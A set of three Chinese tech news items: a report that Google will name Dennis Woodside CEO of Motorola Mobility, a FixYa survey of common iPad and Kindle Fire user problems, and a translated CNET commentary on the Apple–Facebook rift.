2月24日消息,据彭博社报道,消息人士透露,收购摩托罗拉移动的交易完成后,谷歌将任命丹尼斯·伍德赛德(Dennis Woodside)取代桑杰·贾(Sanjay Jha)出任摩托罗拉移动首席执行官。







据悉,在负责并购摩托罗拉移动的工作前,伍德赛德是谷歌美国广告销售业务负责人。投资公司B. Riley & Co.分析师萨米特·辛哈(Sameet Sinha)表示,“伍德赛德需要解决的主要问题是,为应对苹果的攻击,摩托罗拉移动需要采取什么样的硬件策略。这是一个有趣的选择。”



消息人士称,除伍德赛德外,摩托罗拉移动高级副总裁克里斯蒂·怀亚特(Christy Wyatt)和首席策略官约翰·布赫(John Bucher)也在谷歌考虑之列,伍德赛德最后胜出。



    谷歌发言人表示,收购摩托罗拉移动的交易尚未完成,不会就传言或猜测发表评论。摩托罗拉移动发言人未就此置评。

北京时间2月23日早间消息,据美国科技资讯网站CNET报道,根据问答网站FixYa周二发布的最新研究报告,苹果iPad和亚马逊(微博)Kindle Fire用户既存在相同的技术问题,也面临各自独有的挑战。



FixYa调查结果发现,在用户对iPad最不满意的地方中,WiFi连接问题排名首位,35%的受访者表示他们存在这个问题。iPad 2用户抱怨说偶尔会遇到WiFi连接问题。FixYa指出,这个问题经常困扰只支持WiFi网络的平板电脑用户和3G平板电脑的用户。打开WiFi网络然后关闭,或者重新设置整个WiFi网络通常可以解决这个问题。



LED显示问题排名第二,其他屏幕问题排名第五。FixYa网站特别谈到,部分iPad用户抱怨说,屏幕边缘周围会出现亮光。该网站称,这是一个硬件问题,解决难度非常大,但通过调节显示屏的亮度有时可以得到缓解。



iPad麦克风质量问题在这个榜单中排名第三,对于这个问题,FixYa似乎也没什么解决办法。此外,部分用户反映称,他们在通过USB线连接电脑和iPad时,会遇到无法识别的问题。这个问题排名第四。



用户最不满意Kindle Fire的问题中,一键式购物体验排名第一,30%的Kindle Fire用户反映过这个问题。由于不必输入密码,这项功能虽为用户购物提供了诸多便利,但同时也带来了安全问题,小孩可能会在无意中或家长不知情的情况下购买东西,而Kindle Fire一旦丢失或被盗,给用户带来的麻烦会更大。



在这个问题上,FixYa也没有很好的解决办法,只是建议用户在家设置WiFi密码,这样他们的孩子就不能随意从亚马逊网站上购买东西。



同iPad一样,Kindle Fire也存在WiFi连接问题。FixYa建议,Kindle Fire用户可以将系统升级至6.1或6.2版本,另外还可以重新设置路由器或给平板电脑设置静态IP地址。



FixYa CEO亚尼夫·本萨顿(Yaniv Bensadon)在一份声明中称:“平板电脑用户遭遇的问题出现爆炸式增长,这主要是因为Android设备的碎片化问题。尽管苹果在用户当中具有上帝一样的地位,但正如这份报告中发现的,该公司产品并未完全没有问题。”

导语:美国IT网站CNET今天发表署名本·帕尔(Ben Parr)的文章称,Facebook与苹果的不合导致二者的产品迟迟未能整合,而用户则成了最大的受害者。对于这两家公司而言,出于利益的考虑,Facebook更应当主动向苹果示好。



以下为文章全文:



乍一看,苹果似乎是真的喜欢Twitter。但事实是,它憎恨Facebook。至少看起来是这样。



在苹果上周推出山狮(Mountain Lion)系统的开发者预览版时,它对Facebook的厌恶之情一览无余。这款操作系统包含了多项新应用(Game Center、Reminders、Notes)和新功能(Gatekeeper、Notification Center),但却没有整合Facebook——与Facebook整合将使得苹果用户通过这家全球最大社交网络分享更多内容。



相反,苹果再次选择Twitter作为社交媒体合作伙伴。当山狮今年夏天面向消费者出售时,用户将能够直接从该系统附带的应用中发布Twitter消息,iPhone也与Twitter进行了类似的整合。这是Twitter的又一次胜利,在苹果去年将该服务与新版iOS整合后,其用户增长了25%。



苹果为何亲近Twitter而疏远Facebook呢?答案源于这两家公司僵化的关系,这似乎始于苹果在Ping音乐社交服务发布前最后一刻放弃对Facebook的支持。已故苹果联合创始人史蒂夫·乔布斯(Steve Jobs)当时声称,要与Facebook整合,苹果需要承担“繁重的条款”,所以拒绝了。



在惠普(微博)ToudPad引发二者的冲突后,他们的关系进一步恶化。2011年初,Facebook同意面向iPad独家发布首款平板电脑应用。但惠普却有不同计划,他们希望首先为TouchPad发布一款Facebook应用——不出意料,这引发了乔布斯的不满。



Facebook曾经试图阻止TouchPad应用,并扭转形势,但关系依然破裂。自那以后,苹果便高调宣布Twitter为社交媒体合作伙伴,而Twitter最终也通过这两家科技巨头的斗争获利。



不幸的是,真正的失败者却是那些使用Facebook和苹果产品的人。由于这两家公司无法达成协议,使得用户无法从这些有用的功能中获益。



iOS和OS X没有理由不同时支持Facebook和Twitter。最新版iPhoto与Facebook的深度整合,以及有关新版iOS将引入Facebook分享功能的传言,都表明这种整合有望实现。但问题源于自尊。苹果并不是擅长宽容,即使是在后乔布斯时代。



尽管双方未必需要彼此,但修复关系给Facebook带来的利益却大于苹果。Facebook需要刺激用户分享并发布更多信息,以便向他们展示更多广告。毕竟,这是他们的商业模式。由于可以简化并加快使用流程,因此与iOS和OS X深度整合恰恰可以实现这一点。



单从规模来看,Facebook从中获得的好处也将远大于Twitter。另一方面,苹果却不太可能通过Facebook与iOS和OS X的整合获得实质性的销量提升。它根本不需要Facebook。



然而,在移动行业大幅增长的今天,Facebook却应当主动修复关系,并与苹果设备紧密整合。我希望马克·扎克伯格(Mark Zuckerberg)和他的团队能够找到一种方法来恢复破裂的关系,与iOS和OS X整合,这肯定有助于实现Facebook“让世界更开放,连接更紧密”的使命。